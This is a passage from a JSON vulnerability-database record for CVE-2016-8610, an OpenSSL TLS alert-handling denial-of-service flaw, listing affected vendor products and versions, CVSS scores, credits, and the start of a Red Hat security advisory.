"_id": null,
"model": "core rdbms",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19c"
},
{
"_id": null,
"model": "communications analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.1.1"
},
{
"_id": null,
"model": "enterprise linux desktop",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.0"
},
{
"_id": null,
"model": "enterprise linux server aus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.4"
},
{
"_id": null,
"model": "m12-2",
"scope": "gte",
"trust": 1.0,
"vendor": "fujitsu",
"version": "xcp3000"
},
{
"_id": null,
"model": "ontap select deploy",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "m10-1",
"scope": "lt",
"trust": 1.0,
"vendor": "fujitsu",
"version": "xcp3070"
},
{
"_id": null,
"model": "host agent",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "core rdbms",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.1.0.2"
},
{
"_id": null,
"model": "snapdrive",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "communications ip service activator",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.3.4"
},
{
"_id": null,
"model": "service processor",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "pan-os",
"scope": "gte",
"trust": 1.0,
"vendor": "paloaltonetworks",
"version": "7.0.0"
},
{
"_id": null,
"model": "core rdbms",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.2.0.4"
},
{
"_id": null,
"model": "m12-1",
"scope": "lt",
"trust": 1.0,
"vendor": "fujitsu",
"version": "xcp2361"
},
{
"_id": null,
"model": "pan-os",
"scope": "lte",
"trust": 1.0,
"vendor": "paloaltonetworks",
"version": "7.0.15"
},
{
"_id": null,
"model": "oncommand workflow automation",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "pan-os",
"scope": "lte",
"trust": 1.0,
"vendor": "paloaltonetworks",
"version": "6.1.17"
},
{
"_id": null,
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.56"
},
{
"_id": null,
"model": "openssl",
"scope": "eq",
"trust": 0.6,
"vendor": "openssl",
"version": "1.0.2b"
},
{
"_id": null,
"model": "openssl",
"scope": "eq",
"trust": 0.6,
"vendor": "openssl",
"version": "1.0.2"
},
{
"_id": null,
"model": "openssl",
"scope": "eq",
"trust": 0.6,
"vendor": "openssl",
"version": "1.0.2a"
},
{
"_id": null,
"model": "openssl",
"scope": "eq",
"trust": 0.6,
"vendor": "openssl",
"version": "1.0.2c"
},
{
"_id": null,
"model": "openssl",
"scope": "eq",
"trust": 0.6,
"vendor": "openssl",
"version": "1.0.2d"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "16.10"
},
{
"_id": null,
"model": "linux lts",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "16.04"
},
{
"_id": null,
"model": "linux lts",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "14.04"
},
{
"_id": null,
"model": "linux lts i386",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "12.04"
},
{
"_id": null,
"model": "linux lts amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "12.04"
},
{
"_id": null,
"model": "jboss web server",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "0"
},
{
"_id": null,
"model": "jboss core services on rhel server",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "70"
},
{
"_id": null,
"model": "jboss core services on rhel server",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "60"
},
{
"_id": null,
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "7.1"
},
{
"_id": null,
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "7.0.15"
},
{
"_id": null,
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "7.0.14"
},
{
"_id": null,
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "7.0.13"
},
{
"_id": null,
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "7.0.12"
},
{
"_id": null,
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "7.0.11"
},
{
"_id": null,
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "7.0.10"
},
{
"_id": null,
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "7.0.5"
},
{
"_id": null,
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "7.0.4"
},
{
"_id": null,
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "7.0.1"
},
{
"_id": null,
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "7.0"
},
{
"_id": null,
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "7.0.9"
},
{
"_id": null,
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "7.0.8"
},
{
"_id": null,
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "7.0.7"
},
{
"_id": null,
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "6.1"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7"
},
{
"_id": null,
"model": "project openssl",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "1.1"
},
{
"_id": null,
"model": "project openssl",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "1.0.2"
},
{
"_id": null,
"model": "project openssl k",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.8"
},
{
"_id": null,
"model": "project openssl j",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.8"
},
{
"_id": null,
"model": "project openssl i",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.8"
},
{
"_id": null,
"model": "project openssl h",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.8"
},
{
"_id": null,
"model": "project openssl e",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.8"
},
{
"_id": null,
"model": "project openssl d",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.8"
},
{
"_id": null,
"model": "project openssl c",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.8"
},
{
"_id": null,
"model": "project openssl b",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.8"
},
{
"_id": null,
"model": "project openssl a",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.8"
},
{
"_id": null,
"model": "project openssl",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.8"
},
{
"_id": null,
"model": "project openssl 1.0.2h",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl 1.0.2g",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl 1.0.2f",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl 1.0.2e",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl 1.0.2d",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl 1.0.2c",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl 1.0.2b",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl 1.0.2a",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl 1.0.1u",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl 1.0.1t",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl 1.0.1s",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl 1.0.1r",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl 1.0.1q",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl 1.0.1p",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl 1.0.1o",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl 1.0.1n",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl 1.0.1m",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl 1.0.1l",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl 1.0.1k",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl 1.0.1j",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl 1.0.1i",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl 1.0.1h",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl 1.0.1g",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl 1.0.1f",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl 1.0.1e",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl 1.0.1d",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl 1.0.1c",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl 1.0.1b",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl 1.0.1a",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "1.0.1"
},
{
"_id": null,
"model": "project openssl 0.9.8zh",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl 0.9.8zg",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl 0.9.8zf",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl 0.9.8ze",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl 0.9.8zd",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl 0.9.8zc",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl 0.9.8zb",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl 0.9.8za",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl 0.9.8y",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.8x"
},
{
"_id": null,
"model": "project openssl 0.9.8w",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl 0.9.8u",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl 0.9.8t",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl 0.9.8s",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl 0.9.8r",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl 0.9.8q",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl 0.9.8p",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl 0.9.8o",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl 0.9.8n",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl 0.9.8m",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl 0.9.8l",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl 0.9.8g",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl 0.9.8f",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl f",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.8"
},
{
"_id": null,
"model": "project openssl",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.8v"
},
{
"_id": null,
"model": "vios",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2"
},
{
"_id": null,
"model": "sterling connect:direct for unix",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "4.1"
},
{
"_id": null,
"model": "netezza host management",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.4.4"
},
{
"_id": null,
"model": "netezza host management",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.4.3"
},
{
"_id": null,
"model": "netezza host management",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.4.8.0"
},
{
"_id": null,
"model": "netezza host management",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.4.6.0"
},
{
"_id": null,
"model": "netezza host management",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.3.9.0"
},
{
"_id": null,
"model": "netezza host management",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.3.8.0"
},
{
"_id": null,
"model": "netezza host management",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.3.7.0"
},
{
"_id": null,
"model": "netezza host management",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.3.6.0"
},
{
"_id": null,
"model": "netezza host management",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.3.3"
},
{
"_id": null,
"model": "netezza host management",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.3.2.0"
},
{
"_id": null,
"model": "netezza host management",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.3.10.0"
},
{
"_id": null,
"model": "netezza host management",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "4.2.0.0"
},
{
"_id": null,
"model": "datapower gateways",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0"
},
{
"_id": null,
"model": "datapower gateways",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.2.1"
},
{
"_id": null,
"model": "datapower gateways",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.2.0"
},
{
"_id": null,
"model": "datapower gateways",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.1.3"
},
{
"_id": null,
"model": "datapower gateways",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.1.2"
},
{
"_id": null,
"model": "datapower gateways",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.1.1"
},
{
"_id": null,
"model": "datapower gateways",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.1.0"
},
{
"_id": null,
"model": "datapower gateways",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.0.4"
},
{
"_id": null,
"model": "datapower gateways",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.0.3"
},
{
"_id": null,
"model": "datapower gateways",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.0.2"
},
{
"_id": null,
"model": "datapower gateways",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.0.1"
},
{
"_id": null,
"model": "datapower gateways",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.0.0"
},
{
"_id": null,
"model": "datapower gateways",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2.0.9"
},
{
"_id": null,
"model": "datapower gateways",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2.0.8"
},
{
"_id": null,
"model": "datapower gateways",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2.0.6"
},
{
"_id": null,
"model": "datapower gateways",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2.0.5"
},
{
"_id": null,
"model": "datapower gateways",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2.0.4"
},
{
"_id": null,
"model": "datapower gateways",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2.0.3"
},
{
"_id": null,
"model": "datapower gateways",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2.0.2"
},
{
"_id": null,
"model": "datapower gateways",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2.0.10"
},
{
"_id": null,
"model": "datapower gateways",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2.0.1"
},
{
"_id": null,
"model": "datapower gateways",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2.0.0"
},
{
"_id": null,
"model": "datapower gateways",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.1.0.9"
},
{
"_id": null,
"model": "datapower gateways",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.1.0.8"
},
{
"_id": null,
"model": "datapower gateways",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.1.0.7"
},
{
"_id": null,
"model": "datapower gateways",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.1.0.6"
},
{
"_id": null,
"model": "datapower gateways",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.1.0.5"
},
{
"_id": null,
"model": "datapower gateways",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.1.0.13"
},
{
"_id": null,
"model": "datapower gateways",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.1.0.12"
},
{
"_id": null,
"model": "datapower gateways",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.1.0.11"
},
{
"_id": null,
"model": "datapower gateways",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.1.0.10"
},
{
"_id": null,
"model": "datapower gateways",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.1.0.0"
},
{
"_id": null,
"model": "datapower gateways",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.9"
},
{
"_id": null,
"model": "datapower gateways",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.8"
},
{
"_id": null,
"model": "datapower gateways",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.16"
},
{
"_id": null,
"model": "datapower gateways",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.15"
},
{
"_id": null,
"model": "datapower gateways",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.14"
},
{
"_id": null,
"model": "datapower gateways",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.13"
},
{
"_id": null,
"model": "datapower gateways",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.12"
},
{
"_id": null,
"model": "datapower gateways",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.11"
},
{
"_id": null,
"model": "datapower gateways",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.10"
},
{
"_id": null,
"model": "aix",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2"
},
{
"_id": null,
"model": "aix",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.1"
},
{
"_id": null,
"model": "aix",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1"
},
{
"_id": null,
"model": "aix",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.3"
},
{
"_id": null,
"model": "linux sparc",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "linux s/390",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "linux powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "linux mips",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "linux ia-64",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "linux ia-32",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "linux arm",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "linux amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "centos",
"scope": "eq",
"trust": 0.3,
"vendor": "centos",
"version": "6"
},
{
"_id": null,
"model": "pan-os",
"scope": "ne",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "7.0.16"
},
{
"_id": null,
"model": "project openssl 1.1.0b",
"scope": "ne",
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "project openssl 1.0.2j",
"scope": "ne",
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "sterling connect:direct for unix 4.1.0.4.ifix085",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": null
},
{
"_id": null,
"model": "netezza host management",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": "5.4.9.0"
},
{
"_id": null,
"model": "datapower gateways",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.2.2"
},
{
"_id": null,
"model": "datapower gateways",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.1.4"
},
{
"_id": null,
"model": "datapower gateways",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.0.5"
},
{
"_id": null,
"model": "datapower gateways",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2.0.11"
},
{
"_id": null,
"model": "datapower gateways",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": "7.1.0.14"
},
{
"_id": null,
"model": "datapower gateways",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.17"
}
],
"sources": [
{
"db": "BID",
"id": "93841"
},
{
"db": "CNNVD",
"id": "CNNVD-201610-726"
},
{
"db": "NVD",
"id": "CVE-2016-8610"
}
]
},
"credits": {
"_id": null,
"data": "Shi Lei from Gear Team, Qihoo 360 Inc.",
"sources": [
{
"db": "BID",
"id": "93841"
},
{
"db": "CNNVD",
"id": "CNNVD-201610-726"
}
],
"trust": 0.9
},
"cve": "CVE-2016-8610",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CVE-2016-8610",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.1,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-97430",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CVE-2016-8610",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2016-8610",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201610-726",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-97430",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2016-8610",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-97430"
},
{
"db": "VULMON",
"id": "CVE-2016-8610"
},
{
"db": "CNNVD",
"id": "CNNVD-201610-726"
},
{
"db": "NVD",
"id": "CVE-2016-8610"
}
]
},
"description": {
"_id": null,
"data": "A denial of service flaw was found in OpenSSL 0.9.8, 1.0.1, 1.0.2 through 1.0.2h, and 1.1.0 in the way the TLS/SSL protocol defined processing of ALERT packets during a connection handshake. A remote attacker could use this flaw to make a TLS/SSL server consume an excessive amount of CPU and fail to accept connections from other clients. OpenSSL is prone to denial-of-service vulnerability. \nSuccessful exploitation of the issue will cause excessive memory or CPU resource consumption, resulting in a denial-of-service condition. It supports a variety of encryption algorithms, including symmetric ciphers, hash algorithms, security hashing algorithm, etc. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: openssl security update\nAdvisory ID: RHSA-2017:0286-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2017-0286.html\nIssue date: 2017-02-20\nCVE Names: CVE-2016-8610 CVE-2017-3731 \n=====================================================================\n\n1. Summary:\n\nAn update for openssl is now available for Red Hat Enterprise Linux 6 and\nRed Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and\nTransport Layer Security (TLS) protocols, as well as a full-strength\ngeneral-purpose cryptography library. \n\nSecurity Fix(es):\n\n* An integer underflow leading to an out of bounds read flaw was found in\nOpenSSL. \n(CVE-2016-8610)\n\n4. 